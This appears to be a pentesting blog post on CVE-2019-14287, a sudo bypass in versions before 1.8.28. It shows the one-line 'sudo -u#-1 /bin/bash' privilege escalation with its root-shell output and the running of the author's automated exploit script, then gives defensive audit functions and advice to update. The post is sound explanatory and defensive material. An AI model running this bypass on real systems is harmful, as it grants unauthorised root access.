6 July 2022

Pentesting Fun Stuff

following the cyber security path…

Sudo Security Bypass

Recently there was a big commotion about sudo, or ‘superuser do’. Apparently there was a flaw in this immensely popular program, which lets Linux users build a more granular security structure on their operating system. Sudo lets the system admin hand out permissions and control which user can run which program, and whether they can temporarily act as root or not.

With this flaw, a user can run a program as root even if the sysadmin has restricted this. To use the flaw, the user in question needs to have some sort of sudo permission. If the user has no sudo permission, there is no sudo to exploit! Also, the flaw only exists in sudo versions prior to 1.8.28, because it is patched in that version.

An example:

#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification
test ALL=(ALL,!root) /bin/bash

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d

The sudoers file contains a rule for a user (test). This user is restricted from running /bin/bash as root.

test@cyberspace:~$ sudo /bin/bash
[sudo] password for test: 
Sorry, user test is not allowed to execute '/bin/bash' as root on cyberspace.

This is how it normally behaves. The !root restriction in the sudoers file is doing its work.

test@cyberspace:~$ sudo -u#-1 /bin/bash
root@cyberspace:/home/test# id
uid=0(root) gid=1001(test) groups=1001(test)

But by using the flaw, the user test just ran /bin/bash as root, making him root!

Because I like to do CTFs, I created a small script that checks if the sudo version is vulnerable and exploits the flaw with the given sudo permission.

test@cyberspace:~$ git clone https://github.com/n0w4n/CVE-2019-14287.git
Cloning into 'CVE-2019-14287'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (21/21), done.
remote: Total 22 (delta 7), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (22/22), done.
test@cyberspace:~$ cd CVE-2019-14287/
test@cyberspace:~/CVE-2019-14287$ bash sudo.sh 
[-] This user has sudo rights
[-] Checking sudo version
[-] This sudo version is vulnerable
[-] Trying to exploit
root@cyberspace:/home/test/CVE-2019-14287# id
uid=0(root) gid=1001(test) groups=1001(test)

The script can be found on my GitHub page: https://github.com/n0w4n/CVE-2019-14287
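For the admin side, the two conditions described above (a sudo version prior to 1.8.28 and a rule like `(ALL,!root)`) can be audited without touching the flaw itself. This is an added example, not the author's sudo.sh; the function names and the sample sudoers lines are assumptions constructed for illustration.

```sh
# Added audit example (not the author's sudo.sh). Function names are hypothetical.

# Succeeds when an upstream sudo version string is older than 1.8.28.
# Distribution packages can carry a backported fix under an older
# version string, so treat a hit as a prompt to check the package changelog.
sudo_version_vulnerable() {
    printf '%s\n' "$1" | awk -F'[.a-z]' \
        '{ exit !(NF >= 3 && ($1 * 1000000 + $2 * 1000 + $3) < 1008028) }'
}

# Prints "line: rule" for every sudoers rule whose Runas user list combines
# ALL with a negated root (!root or !#0), the pattern shown in the post.
# Reads the files given as arguments, or stdin when none are given.
risky_runas_rules() {
    awk '
        /^[ \t]*(#|$)/ { next }                  # comments, blank lines
        match($0, /=[ \t]*\([^)]*\)/) {
            runas = substr($0, RSTART, RLENGTH)
            sub(/^=[ \t]*\(/, "", runas); sub(/\)$/, "", runas)
            sub(/:.*/, "", runas)                # drop the group list
            gsub(/[ \t]/, "", runas)
            n = split(runas, u, ",")
            all = 0; noroot = 0
            for (i = 1; i <= n; i++) {
                if (u[i] == "ALL") all = 1
                if (u[i] == "!root" || u[i] == "!#0") noroot = 1
            }
            if (all && noroot) print FNR ": " $0
        }
    ' "$@"
}

# Constructed sample input, modelled on the sudoers file in the post.
SAMPLE_SUDOERS='root ALL=(ALL:ALL) ALL
test ALL=(ALL,!root) /bin/bash
%sudo ALL=(ALL:ALL) ALL
# bob ALL=(ALL,!root) /usr/bin/vi
alice ALL=(ALL, !#0 : ALL) /usr/bin/id'

printf '%s\n' "$SAMPLE_SUDOERS" | risky_runas_rules
for v in 1.8.21p2 1.8.27 1.8.28 1.9.5p2; do
    if sudo_version_vulnerable "$v"; then echo "$v: older than 1.8.28"
    else echo "$v: 1.8.28 or later"; fi
done
# On a real host, one file at a time: risky_runas_rules /etc/sudoers
```

Any rule it prints is worth rewriting as an explicit allow-list of Runas users, whatever the installed sudo version.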

Also… don’t forget to update your Linux version!!! Happy hacking…

 
